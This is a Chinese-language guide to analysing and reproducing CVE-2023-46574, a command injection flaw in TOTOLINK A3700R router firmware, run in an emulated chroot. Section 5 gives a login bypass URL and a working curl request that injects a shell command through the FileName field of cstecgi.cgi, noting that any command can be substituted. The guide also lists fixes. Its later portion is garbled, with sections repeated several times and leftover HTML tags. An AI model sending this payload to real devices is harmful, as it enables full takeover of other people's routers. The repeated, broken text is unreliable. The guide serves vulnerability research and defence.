TOTOLINK命令执行漏洞(CVE-2023-46574)分析与复现指南<\/h1>

1. 漏洞概述<\/h2>
CVE-2023-46574是TOTOLINK路由器中的一个命令执行漏洞，存在于`cstecgi.cgi<\/code>程序中。攻击者可以通过构造恶意请求在设备上执行任意命令，导致系统被完全控制。<\/p>`

2. 环境搭建<\/h2>
2.1 安装必要工具<\/h3>
sudo apt-get install schroot debootstrap
<\/span><\/span><\/code><\/pre>2.2 创建mipsel架构的chroot环境<\/h3>
sudo debootstrap --arch=<\/span>mipsel bookworm \/iotconfig\/debootstrap\/mipsel https:\/\/mirrors.aliyun.com\/debian
<\/span><\/span><\/code><\/pre>2.3 配置schroot<\/h3>
编辑配置文件\/etc\/schroot\/chroot.d\/mipsel.conf<\/code>:<\/p>
[mipsel]<\/span>
<\/span><\/span>type<\/span>=<\/span>directory<\/span>
<\/span><\/span>directory<\/span>=<\/span>\/iotconfig\/debootstrap\/mipsel<\/span>
<\/span><\/span>users<\/span>=<\/span>root<\/span>
<\/span><\/span>groups<\/span>=<\/span>root<\/span>
<\/span><\/span>root-groups<\/span>=<\/span>root<\/span>
<\/span><\/span><\/code><\/pre>2.4 进入chroot环境<\/h3>
sudo schroot -c chroot:mipsel -u root
<\/span><\/span><\/code><\/pre>3. 固件分析<\/h2>
3.1 解压固件<\/h3>
sudo binwalk --run-as=<\/span>root -Me TOTOLINK_A3700R_V9.1.2u.6165_20211012.web
<\/span><\/span><\/code><\/pre>3.2 识别Web服务<\/h3>
解压后查看squashfs-root<\/code>目录，发现lighttpd<\/code>文件夹，表明使用lighttpd作为Web服务器。<\/p>
3.3 复制文件到chroot环境<\/h3>
sudo cp -r squashfs-root \/iotconfig\/debootstrap\/mipsel\/root\/
<\/span><\/span><\/code><\/pre>4. 启动模拟环境<\/h2>
4.1 进入chroot环境<\/h3>
sudo schroot -c chroot:mipsel -u root
<\/span><\/span>chroot squashfs-root\/
<\/span><\/span><\/code><\/pre>4.2 启动lighttpd服务<\/h3>
lighttpd -f lighttp\/lighttpd.conf
<\/span><\/span><\/code><\/pre>如果启动失败，创建必要的pid文件：<\/p>
mkdir \/var\/run
<\/span><\/span>touch \/var\/run\/lighttpd.pid
<\/span><\/span><\/code><\/pre>5. 漏洞利用<\/h2>
5.1 绕过登录<\/h3>
由于未设置密码，可以通过以下方式绕过登录：<\/p>

抓取登录请求<\/li>
直接访问URL: http:\/\/127.0.0.1\/formLoginAuth.htm?authCode=1&userName=&goURL=home.html&action=login<\/code><\/li>
<\/ol>
5.2 获取Session ID<\/h3>
通过浏览器开发者工具或抓包工具获取SESSION_ID<\/code>。<\/p>
5.3 执行命令<\/h3>
使用curl发送恶意请求：<\/p>
curl http:\/\/127.0.0.1\/cgi-bin\/cstecgi.cgi -b "SESSION_ID=2:1708017806:2"<\/span> -X POST -d '{"topicurl":"UploadFirmwareFile","FileName":";ls -a;"}'<\/span>
<\/span><\/span><\/code><\/pre>其中ls -a<\/code>可以替换为任意命令。<\/p>
6. 漏洞分析<\/h2>
漏洞位于cstecgi.cgi<\/code>程序中，FileName<\/code>参数未经充分检查就直接传递给doSystem<\/code>函数，导致命令注入。<\/p>
7. 修复建议<\/h2>

对用户输入进行严格过滤和验证<\/li>
避免直接将用户输入传递给系统命令<\/li>
使用参数化方式执行系统命令<\/li>
更新到厂商发布的最新固件版本<\/li>
<\/ol>
8. 参考资源<\/h2>

固件文件: TOTOLINK_A3700R_V9.1.2u.6165_20211012.zip<\/li>
漏洞编号: CVE-2023-46574<\/li>
<\/ul>
通过以上步骤，可以完整复现TOTOLINK路由器中的命令执行漏洞，并理解其原理和利用方式。<\/p>

TOTOLINK命令执行漏洞(CVE-2023-46574)分析与复现指南<\/h1>

1. 漏洞概述<\/h2>
CVE-2023-46574是TOTOLINK路由器中的一个命令执行漏洞，存在于`cstecgi.cgi<\/code>程序中。攻击者可以通过构造恶意请求在设备上执行任意命令，导致系统被完全控制。<\/p>`

3. 固件分析<\/h2>

3.2 识别Web服务<\/h3>
解压后查看`squashfs-root<\/code>目录，发现lighttpd<\/code>文件夹，表明使用lighttpd作为Web服务器。<\/p>`

4. 启动模拟环境<\/h2>

5. 漏洞利用<\/h2>

5.2 获取Session ID<\/h3>
通过浏览器开发者工具或抓包工具获取`SESSION_ID<\/code>。<\/p>`

8. 参考资源<\/h2>

固件文件: TOTOLINK_A3700R_V9.1.2u.6165_20211012.zip<\/li>
漏洞编号: CVE-2023-46574<\/li> <\/ul>
通过以上步骤，可以完整复现TOTOLINK路由器中的命令执行漏洞，并理解其原理和利用方式。<\/p>

TOTOLINK命令执行漏洞(CVE-2023-46574)分析与复现指南<\/h1>

1. 漏洞概述<\/h2> CVE-2023-46574是TOTOLINK路由器中的一个命令执行漏洞，存在于cstecgi.cgi<\/code>程序中。攻击者可以通过构造恶意请求在设备上执行任意命令，导致系统被完全控制。<\/p>

3. 固件分析<\/h2>

3.2 识别Web服务<\/h3> 解压后查看squashfs-root<\/code>目录，发现lighttpd<\/code>文件夹，表明使用lighttpd作为Web服务器。<\/p>

4. 启动模拟环境<\/h2>

5. 漏洞利用<\/h2>

5.2 获取Session ID<\/h3> 通过浏览器开发者工具或抓包工具获取SESSION_ID<\/code>。<\/p>

8. 参考资源<\/h2> 固件文件: TOTOLINK_A3700R_V9.1.2u.6165_20211012.zip<\/li> 漏洞编号: CVE-2023-46574<\/li> <\/ul> 通过以上步骤，可以完整复现TOTOLINK路由器中的命令执行漏洞，并理解其原理和利用方式。<\/p>

1. 漏洞概述<\/h2>
CVE-2023-46574是TOTOLINK路由器中的一个命令执行漏洞，存在于`cstecgi.cgi<\/code>程序中。攻击者可以通过构造恶意请求在设备上执行任意命令，导致系统被完全控制。<\/p>`

3.2 识别Web服务<\/h3>
解压后查看`squashfs-root<\/code>目录，发现lighttpd<\/code>文件夹，表明使用lighttpd作为Web服务器。<\/p>`

5.2 获取Session ID<\/h3>
通过浏览器开发者工具或抓包工具获取`SESSION_ID<\/code>。<\/p>`

8. 参考资源<\/h2>

固件文件: TOTOLINK_A3700R_V9.1.2u.6165_20211012.zip<\/li>
漏洞编号: CVE-2023-46574<\/li> <\/ul>
通过以上步骤，可以完整复现TOTOLINK路由器中的命令执行漏洞，并理解其原理和利用方式。<\/p>